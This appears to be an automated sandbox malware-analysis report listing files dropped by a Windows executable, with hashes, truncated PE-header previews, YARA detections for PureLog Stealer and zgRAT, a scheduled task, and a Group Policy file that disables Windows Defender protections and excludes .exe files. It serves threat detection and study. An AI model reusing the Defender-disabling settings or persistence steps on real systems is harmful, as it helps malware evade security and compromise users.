SHA-512:	1B5BCAFBB11956B59D2FB15F29E246FB296B192BF675DAF56845EB776307C5ECBE711FA855316A990CAD887B5A2FBCB059DC25039C3B7397815A6537C9F5E594
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b.e...............".............:............@...................................W...@.........................\.c.J.....G.@....................U.@}......................................... ...@............ B..............................text...X........................... ..`.rdata...<..........................@..@.data....H...0......................@....vmp..{........................... ..`.vmp....... B.....................@....vmp.. .U..0B...U................. ..`.reloc...............U.............@..@.rsrc................U.............@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4371848
Entropy (8bit):	7.958004117755538
Encrypted:	false
SSDEEP:	98304:Jak2rBgQfQBO+kzrSFtHCULP6tfKPz4QF3r9WIw5oNx+t:Uz5TBz4iULCtkz4QV5Wt5ofE
MD5:	19625E4EEA21C969143C6C5E964D16B1
SHA1:	C16D4769E2C8A3194517C49297BD6573A58EA56E
SHA-256:	E896359AA152C4C3D401E6E2026C559822176AEECF8A14CCAF77DA9AB0662507
SHA-512:	0BAA5DC853BED59C66095C68107668E25DC0685223C6FB6DA0846D9C7716B40913BC30DB2A6B2924FE4F6C5C8D5537B5010499607832E77B68571CF7B613D298
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L.....Qd.....................<.......<............@..........................@........B......................................`..P....P................B.................8............................U..@............................................text...P........................... ..`.rdata..Lj.......l..................@..@.data.......p...n@..V..............@....rsrc........P........A.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4371848
Entropy (8bit):	7.9580060885043515
Encrypted:	false
SSDEEP:	98304:Jak2rBgQfQBO+kzrSFtHCULP6tfKPz4QF3r9WIw5oNx+N:Uz5TBz4iULCtkz4QV5Wt5ofc
MD5:	0CF89B056C66BEF40DEDB8AFC4F57EB6
SHA1:	D73AC89A4DA0B120F296E9B0CB591AAA75D811E4
SHA-256:	3949C37BB29511D9D08A8967B10A007B6775AA6AE5FFCD8BF2F939C0614E0D64
SHA-512:	C11018A73AD05029644A4D43839E3E65A7692202E719C40DB5D9AF67F0111A4252F17DE36FA4A3315ED89ED5A34DF99C6FDD7666B8C06F19C9B72B6244744915
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L.....Qd.....................<.......<............@..........................@........B......................................`..P....P................B.................8............................U..@............................................text...P........................... ..`.rdata..Lj.......l..................@..@.data.......p...n@..V..............@....rsrc........P........A.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1945878
Entropy (8bit):	7.993621351410419
Encrypted:	true
SSDEEP:	49152:32KoXBLPcDl5AENYQHMu2GXH+3yuILkIVRSoP8TWAp:mM5OESezpqYzVGTWAp
MD5:	934A4D455165C851267269B2823667FB
SHA1:	CC52AE8F31716621B9595E5C89A97A4524E16CC3
SHA-256:	8A41B8ED589ACA9E4810BB979DC993D87499B494299475DE87B851BF8C20D7ED
SHA-512:	129DD5908A01B8114C42EE0C1E272AB085B0E83E7C5DE182A582C7328971DB59FBFABB54185E0347CBFAA6E09D584AAF8938DFB0326475E359DF5E3F935C08E8
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F......$.............@..........................@...................@..............................P........,..........................................................................................................CODE....D........................... ..`DATA....L...........................@...BSS.....H................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	401544
Entropy (8bit):	7.825020028777303
Encrypted:	false
SSDEEP:	12288:iSDt4gq9aVLevhc02f0/nndTHh3Ep2a7TL:5Dqg6hcR2ndTZe2a7TL
MD5:	89EC2C6BF09ED9A38BD11ACB2A41CD1B
SHA1:	408549982B687CA8DD5EFB0E8B704A374BD8909D
SHA-256:	DA1E155C46CA6B23409D059B6D85341C0B86C92D2C69DBDA85EEF3894313662D
SHA-512:	C565DBB25DD35AE8DCE2A4CF15640053ACA8B99C5C78DB23648E6618EF316362B77142C6524B47089A7EA05632ADEE091EC5E82ED95AEB86D2331B8C5F8CC56A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................n.... ........@.. .......................@............`................................. ...K.......H................N... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...H...........................@....reloc....... ......................@..B................P.......H............X..........X....%...........................................0..V.......~....:K.........(.... .... .... ....s....(............(....(.... ....?....r...ps....z...(K...(............0.....................................(K...(.... .........%.....($...........0.....................SZ.......s....&........(K............0.............A...........-...-............(K.....(K.....(K.....(K.....(K............(K...(...........%.....($........ .........%.....($

C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7828164
Entropy (8bit):	7.997130842409362
Encrypted:	true
SSDEEP:	196608:91ODvTJNMJo5k57XO1bBTt+uncBI5w9Us1QP4:3ODbSO35r+ycBkgUs2A
MD5:	2A9FA9F2EFF4AEA3FFBD2407751B7A51
SHA1:	579F6935B3E354AD384D94F3F2B7685824FF33B3
SHA-256:	E8F19D0BA10FE8E99BCC1DBC5DB185BFA619E5853B73554240805E9A6995DBFE
SHA-512:	EEF07120F40FA0CD3359C546B02141EA006F41783DB6420972430BDD2DA9C8EC6F3718A504CE66C96EFA880798AF4C7FA87B8F9798776A87C5DE925262BD240C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5099600
Entropy (8bit):	6.899033781823371
Encrypted:	false
SSDEEP:	49152:OmhxjW6ncW+4Zb15jx2QZ88rPKsm+9BnHrkBnqFoniEqtVwSoiG9/u8T2XXNwiv7:OmhxjW6ncWFZbd7Hrk5HnlmAX2Xdwi
MD5:	9EFA9907423CC7A421C7008BD8A0BF0D
SHA1:	D147885CE6F126C41CA47DBDBB48A4BCABC5DFB3
SHA-256:	691B46C7437376EB222B6223D1509E58DAE34CA40B6E02DB37E9690EA97D1431
SHA-512:	894A3E2090C2B3298BB08EAB81832DD76BDB9D4C0B59642477666D97D088D3DA38EC0A7605332BDA7DDB432EB775FD7853D51D6436CE647B5A89D4BED8AC59A1
Malicious:	true
Yara Hits:	Rule: INDICATOR_EXE_Packed_DotNetReactor, Description: Detects executables packed with unregistered version of .NET Reactor, Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe, Author: ditekSHen
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................P..pK..........K.. ....K...@.. ........................M.....F.N...@...................................K.K.....K..............DM.P.....M...................................................... ............... ..H............text....nK.. ...pK................. ..`.rsrc.........K......rK.............@..@.reloc........M......BM.............@..B..................K.....H....... Q..."......K....s-.F...........................................:+.(9g?:.(.....V+.(sj7f..(....8.......B+.(..OS~..........6+.(..EK~.......0..........+.(K.0O ........8........E....E...i...%...h.......8@...s......... .....:....& ....8....s......... .....:....& ....8....s.........8....s......... ....8....s......... ....8j.....0..M.......+.(\.!Q8/.......E........8......8.... ....(....9....&8.....~....o......8........0.._.......+.(t..g ........8........E............8.

C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	278664
Entropy (8bit):	7.762811308800484
Encrypted:	false
SSDEEP:	3072:808fi2s4FpronoEtI/Ev2buZOQXyA5H61/lEB97AS9yAfaAh9z7F4Ry3mvOv2vEC:OVFpekG2bU7sW720L9zRkyWvdvEJnYH
MD5:	1163DFDB973A2054DC853BA3723E0363
SHA1:	EB7A3AC74BAA748CD4700D9B981F31831DD9790F
SHA-256:	FD58FFE7E5760B1A476090D134A79470AA7AEAEDD70E57D608F161EC5841A992
SHA-512:	1D0C550D16921F511475666B3A7D54AB07F31EDC2967C48F8ADEFEA1C04B7B248E27F9ECCF29A83E01E3BB0D93936E2C788BE54FC784FE065E58E1AF9AF1CC24
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....I.f................................. ... ....@.. .......................`............`.....................................K.... ..P................N...@......x................................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H........w..Pt..........@................................................0.......... ........8........E....1.......\|...........8,.......~....(....~....(.... ....?.... ....8....~....(.... .... .... ....s....~....(........ ....~....{l...:v...& ....8k......... ....~....{x...:Q...& ....8F...r...ps....z~....:.... ....8&....(...........(....N.............(....&~..........~.......(.......]....0.......... 2.......8........EW.......................?.......z...........Q...C....

C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4309408
Entropy (8bit):	7.38603860379657
Encrypted:	false
SSDEEP:	49152:UZpwrL+M9T9fSRvgwJl5FQsSRWZwpx1BcRj0wRUAAV7DW1lDj66Na0BYrM4:UyL9aUsSRCw/1Bc1opVDWvfNaOyM4
MD5:	A8F21FFC9630C023FD163AF0DA7EAD26
SHA1:	A4D39A5C6FC506EDDD267ED4174FF3986F168121
SHA-256:	EFC1CF307C9475A3C3FFDF3FCDEAC5A712C9863242A2BBB043D64C25A143D0DF
SHA-512:	4E45AF34C726C3A902D8C69EE25935BE31EC9C9CDE1100F448093C3D00FB7FA04D1C0FC36139A32844977EB6AEAD8E5B0EB19A92649F773870C5511E3036F2D5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe, Author: Joe Security Rule: INDICATOR_EXE_Packed_DotNetReactor, Description: Detects executables packed with unregistered version of .NET Reactor, Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe, Author: ditekSHen Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe, Author: ditekSHen
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................P..B;..........`;.. ....;...@.. .......................`A.......B...@.................................p`;.K.....;...............@......@A...................................................... ............... ..H............text....@;.. ...B;................. ..`.rsrc.........;......D;.............@..@.reloc.......@A.......@.............@..B.................`;.....H........R..........C........!...........................................(....:..(....8......&~..........~......0..t.......8!.......E....a...8\...s.........8....s.........8....s.........8 ...s......... .....9....& ....8....s.........8.....0...........~....o......8......8....8......0..$.......8....8....8.....~....o......8.......0..$.......8.......~....o......8....8....8.....0..$.......8.......~....o......8....8....8.....0...........~....o......8....8....8.......&~..

C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1963008
Entropy (8bit):	7.9513873199684735
Encrypted:	false
SSDEEP:	49152:yZMc3Ruw+Oz8bg96lpEXUIxpGKj6hET7PVeQBEJ6OfKxSqJX8ZLMPd:yZMkuw+Oz8g9kpEEIxpRT7PVercpgbZO
MD5:	46C4BF1B012F8B2E5B8F45F4F6FD97F5
SHA1:	00EBBCA9577B0AAE70E7198A61DD2357157E4B88
SHA-256:	4AA6211D1C8A3C67F29079243B48CC36A20D142804A5C2385CECD74DF75D2B69
SHA-512:	B19C84D61A36C9E79C5ED3945C0651970BCE46E6B8B62A22EF299C68D63758109AD3C8B9F73800291A42628A41D4FC0F03A59727774C318E575B496745CA7A86
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.Y@...@...@....m..Q....m.......h..R....h..W....h..5....m..U....m..S...@........k..A....k1.A....k..A...Rich@...........PE..L...o..e..............................M...... ....@...........................M...........@.................................V...j.............................M.............................l.M..................................................... . ............................@....rsrc...............................@....idata ............................@... . ,.........................@...iomijoue......2.....................@...cpzudpwp......M.....................@....taggant.0....M.."..................@...................................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	285320
Entropy (8bit):	7.719919270840511
Encrypted:	false
SSDEEP:	6144:5ok6GPg9b2t0eQnQqRRtf3G82ed6JcVsk:5D6GPg9b2t5+jRtfJdJB
MD5:	B6BBB03B84E589433F139D88CA24C62D
SHA1:	2EEEED07176DE200EAF5BC207852781DDC5DA2B5
SHA-256:	B9220E18F15660F7649D01F17B9B787982442067449C0F27FCE621F365B91EDD
SHA-512:	09075709691B8FBA668184B2469C5BDC7174BCB3E16DE2D046BF7ABFF6257F941E36D2A28DB2E42B88807E1BA3C15165875FB82485C621D60F9001BED62EE4DE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................!... ...@....@.. ....................................`..................................!..K....@..H................N...`......9!............................................... ............... ..H............text........ ...................... ..`.rsrc...H....@......................@....reloc.......`......................@..B.................!......H...........X...............%...........................................0..V.......~....:K.........(.... .... .... ....s....(............(....(.... ....?....r...ps....z...(K...(............0.....................................(K...(.... .........%.....($...........0.....................SZ.......s....&........(K............0.............A...........-...-............(K.....(K.....(K.....(K.....(K............(K...(...........%.....($........ .........%.....($

C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5713216
Entropy (8bit):	7.99055921980448
Encrypted:	true
SSDEEP:	98304:sn8n3+dVJpuOH9FjvWlc/N/zF3+GHGsCMuQkL3rLliu/OP3anh7AaFOMlrZf:sn8n3+7hPvWlc/v0LQkL3/gOnh7ALMlN
MD5:	B474DC1155AF2463F2F9F603E39264FB
SHA1:	B30E2BCB582A0C300C057428BD3F2B8169F5C7B6
SHA-256:	81031D876F36D8CA2F1B73AA8BDE63134C66F60991070B183E2C1F40463D695C
SHA-512:	0687187C8CEA7098947E57C84DA1A81CBF2F9380F19242FF3F94104BD70B7A21A41C1AA6DE508E4A8D65ACD31FE85FF1AEC4E89C69A0836046CC6FE99B12C7E4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b.e..............."............(d............@..........................P........X...@.........................$...J.......@....0................V.@}......T.......................................@.............B..............................text...X........................... ..`.rdata...<..........................@..@.data....H...0......................@....vmp..D........................... ..`.vmp........B.....................@....vmp...tV...B..vV................. ..`.reloc..T.............V.............@..@.rsrc........0........V.............@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5726528
Entropy (8bit):	7.992347531872189
Encrypted:	true
SSDEEP:	98304:jTZxi0wECRGcZrKEMGNvSkiU3i4zHDRj0qoeHRX15cUmEHTA7TVNL/:R0dRGcZ2ibj3/jRYqoehJ07Rt
MD5:	66373AA110A885E380BBA4FFABC8157F
SHA1:	872F9E36181AAAB827E73F8A2FE8AD3CE39AF512
SHA-256:	259E2D31DA2CB44EF19CC18453924EB3C4588EABF51D5182ECAF9D60266CF60D
SHA-512:	13172D98BF316CD22CC211FF01A5FA98F9072D91B34C6CD2E2463B6F45F54C757B00DEC59A0E4681E09B39D2B5DDA2452146F9BFC0A88DF4530BD9757E6D884A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b.e...............".............vL...........@...................................W...@...........................K.J....z].@.....................V.@}...p.......................................d..@.............B..............................text...X........................... ..`.rdata...<..........................@..@.data....H...0......................@....vmp...'/......................... ..`.vmp........B.....................@....vmp....V...B...V................. ..`.reloc.......p........V.............@..@.rsrc.................V.............@..@................................................................................................................................................................................................................................................................................................................

C:\Windows\Logs\StorGroupPolicy.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	28734
Entropy (8bit):	4.918059524026431
Encrypted:	false
SSDEEP:	768:QhnnnnTEzzUUJBRRRVVrlrrrrYZrrrt5X0SHgHgZgZgUgUi/1OkGk1/pprYHHH1B:QhnnnnTEzzUUJBRRRVVrlrrrrYZrrrtW
MD5:	BD5A2D8B69683C3FC845FA390323ABD2
SHA1:	1B3E987EA5E76DAD85A437AE9E0E159ED648E74C
SHA-256:	03D9050854A223CE106F4A600872B2040FD6CA791FE2CC0E93A33BDA7BA3FBDF
SHA-512:	0B9F18A4D41E659113434F458F3C176ADBB8028492B9A742964FE131F92EEE5526961A0E922B5FF4D3F7BFC88BE69E24F7CEF75881FC55EE247FE379D94E2D46
Malicious:	false
Reputation:	unknown
Preview:	10/03/2023 7:55:56.00000693:RegEnumKeyExW failed with (259)..10/03/2023 7:55:56.00000693:GP object initialized successfully..10/03/2023 7:55:56.00000756:Deny_All not set for all. Will query other 6 GUIDs..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000787:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000787:Deny_All for all devices is being reset..10/03/2023 7:55:56.00000787:Will delete security for disk..10/03/2023 7:55:56.00000787:Volume interface name \\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}..10/0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\System32\GroupPolicy\Machine\Registry.pol

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	RAGE Package Format (RPF),
Category:	dropped
Size (bytes):	1926
Entropy (8bit):	3.310422749310586
Encrypted:	false
SSDEEP:	24:wSLevFeSLe5BeSwbv5qweSw4q7j/eScdepWDbVeScden2W8eScdemevtmeScdeRg:KFIBkbv5qwk4qfKV2QxVCZ
MD5:	CDFD60E717A44C2349B553E011958B85
SHA1:	431136102A6FB52A00E416964D4C27089155F73B
SHA-256:	0EE08DA4DA3E4133E1809099FC646468E7156644C9A772F704B80E338015211F
SHA-512:	DFEA0D0B3779059E64088EA9A13CD6B076D76C64DB99FA82E6612386CAE5CDA94A790318207470045EF51F0A410B400726BA28CB6ECB6972F081C532E558D6A8
Malicious:	false
Reputation:	unknown
Preview:	PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.A.n.t.i.S.p.y.w.a.r.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.R.o.u.t.i.n.e.l.y.T.a.k.i.n.g.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s...;.E.x.c.l.u.s.i.o.n.s._.E.x.t.e.n.s.i.o.n.s...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s.\.E.x.t.e.n.s.i.o.n.s...;.e.x.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.r.o.t.e.c.t.i.o.n...;.D.i.s.a.b.l.e.B.e.h.a.v.i.o.r.M.o.n.i.t.o.r.i.n.g...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.

C:\Windows\System32\GroupPolicy\gpt.ini

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	127
Entropy (8bit):	5.080093624462795
Encrypted:	false
SSDEEP:	3:1ELGUAgKLMzY+eWgTckbnnvjiBIFVTjSUgf4orFLsUov:1WsMzYHxbnvEcvgqv
MD5:	8EF9853D1881C5FE4D681BFB31282A01
SHA1:	A05609065520E4B4E553784C566430AD9736F19F
SHA-256:	9228F13D82C3DC96B957769F6081E5BAC53CFFCA4FFDE0BA1E102D9968F184A2
SHA-512:	5DDEE931A08CFEA5BB9D1C36355D47155A24D617C2A11D08364FFC54E593064011DEE4FEA8AC5B67029CAB515D3071F0BA0422BB76AF492A3115272BA8FEB005
Malicious:	true
Reputation:	unknown
Preview:	[General]..gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}]..Version=1..

C:\Windows\Tasks\explorha.job

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe
File Type:	data
Category:	dropped
Size (bytes):	288
Entropy (8bit):	3.4468460900338718
Encrypted:	false
SSDEEP:	6:x+li+uzX4RKUEZ+lX1y6y2l+lRdtPjgsW2YRZuy0lphzut0:x+ll84RKQ1y6NkDHjzvYRQVpZut0
MD5:	7F1BF14447127C1E83FD035DE9E37D37
SHA1:	40109F920B33EE8E96F64BE6A3A4DF60E644B5D2
SHA-256:	6588934E937AD7159D088684B6ED6BE7D6442C628C6241C7E8E3AA65624A5337
SHA-512:	49860A968459631ADF8A6A9D6B56B9C4A1710B17D75141297E3093BDF7EFEE73E478778538CCCDDF3985D0FFDA32B317818960C612C42A2B47E8BB18DA0A1859
Malicious:	false
Reputation:	unknown
Preview:	.........@....,.\|F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.9.f.d.8.5.1.a.4.f.\.e.x.p.l.o.r.h.a...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.935605768137229
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	i1crvbOZAP.exe
File size:	3'396'944 bytes
MD5:	4204b9d4c4df5c4b4d67922db24f342a
SHA1:	9255b5e94028f3f55adda2576d60bd39452eaf08
SHA256:	62cd7b447bdee3ec1670c92d9585e1fddbaa5d4ee824dee8f15940005bf95414
SHA512:	0b4ed4d6397c9f34cf2c72d9c581a6e5d94eabf395da0010073b1600883dac6fcc48c1606ffee29952bd60707caf03b8a6d6cf644b2ac668306b4a418d726423
SSDEEP:	49152:l/Ki16IscOcmroPBql2IzydQgfTzTGKr6d61YryTz3onQqHlfBrfgOtat:Ujpreg7zyWsFGd61QYoHBroO4t
TLSH:	4EF5123713D55524E3BEEBB06A7A63300B22FC846CB2E61D5352DA496C7F701A973722
File Content Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.........M...#...#...#... ...#...&.{.#...#...#...'...#.\|.&...#.\|. ...#.uZ....#.uZ&...#.uZ'...#.uZ ...#..."...#...".Y.#.DY+...#.DY....#

File Icon


Icon Hash:	07e3e3c3cbf9c8e7

Static PE Info

General

Entrypoint:	0x140809d68
Entrypoint Section:	.boot
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6601A1B2 [Mon Mar 25 16:09:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	bedb96d8a71f9004abf64308e680fcb9

Authenticode Signature

Signature Valid:	false
